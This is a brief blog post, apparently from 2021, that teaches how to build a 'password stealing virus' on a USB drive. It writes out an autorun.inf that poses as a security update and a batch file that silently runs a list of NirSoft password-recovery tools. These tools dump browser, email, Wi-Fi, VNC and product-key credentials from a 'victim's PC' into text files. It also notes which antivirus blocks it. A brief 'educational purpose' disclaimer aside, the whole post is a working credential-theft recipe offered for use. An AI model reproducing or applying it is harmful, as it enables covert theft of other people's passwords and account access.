HOW TO MAKE A PASSWORD STEALING VIRUS?

Ayush Saxena
2 min readMay 27, 2021

--

Hello everyone! Today I’ll show you how to make a virus that will steal passwords from PC.

NOTE: This blog is only meant for educational purpose.

So lets get started🔥

Aa we all know, Windows stores most of the passwords which are used on a daily basis. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP protocols, and auto-complete passwords of many browsers like Chrome or Firefox. There exist many applications for stealing these passwords from their stored places. Using these applications and a USB pen-drive we can create our own rootkit to steal passwords from any person’s computer.

  1. Now to execute plan open notepad and type the following code:

[autorun]

open=update.bat

ACTION = IMPORTANT: Install security updates

2. Now save this notepad file with the name “autorun.inf”. Make sure about the extension.

3. Now open the new file in the notepad again and type the following code:

start mspass.exe / stext mspass.txt

start mailpv.exe / stext mailpv.txt

start ipev.exe / stext ipev.txt

start pspv.exe /stext pspv.txt

start PasswordFox.exe / stext passwordfox.txt

start OperaPassView.exe / stext OperaPassView.txt

start ChromePass.exe / stext ChromePass.txt

start Dialupass.exe / stext Dialupass.txt

start netpass.exe / stext netpass.txt

start WirelessKeyView.exe / stext WirelessKeyView.txt

start BulletPassView.exe / stext BulletPassView.txt

start VNCPassView.exe / stext VCNPassView.txt

start OpenedFilesView.exe / stext OpenedFiles.txt

start ProduKey.exe / stext ProduKey.txt

start USBDeview.exe / stext USBDeview.txt

4. Save this file as “update.bat”

5. Go to http://www.nirsoft.net and download all the files that we mentioned in the code of 3rd step. Note that these files should be in .exe format. Now when you have all the files ready, copy the fie “autorun.inf” & “update.bat” and the .exe files downloaded from the site into a pen-drive. Now the pen-drive will act as our stealing tool.

6. Insert the pen-drive into victim’s PC and the autorun window will pop up because we have created an autorun.inf. In the pop up window, you will see the exact message that we wrote. You can change it accordingly. Now all the password stealers will silently get executed in the background. This process takes hardly a few seconds. The passwords get stored in the .txt files. Remove the pen-drive and you are done.

WHERE TO SEE STOLEN PASSWORDS?

Simply go to My Computer on your PC then to your USB drive and open it. You’ll see some .txt (text) files, if you open them you will see the stolen usernames and passwords.

NOTE:

This method doesn’t work with some of the antiviruses like K7, they remove this autorun.inf file.

--

--

Ayush Saxena
Ayush Saxena

Written by Ayush Saxena

Finding Vulnerabilities out of Chaos ;)

No responses yet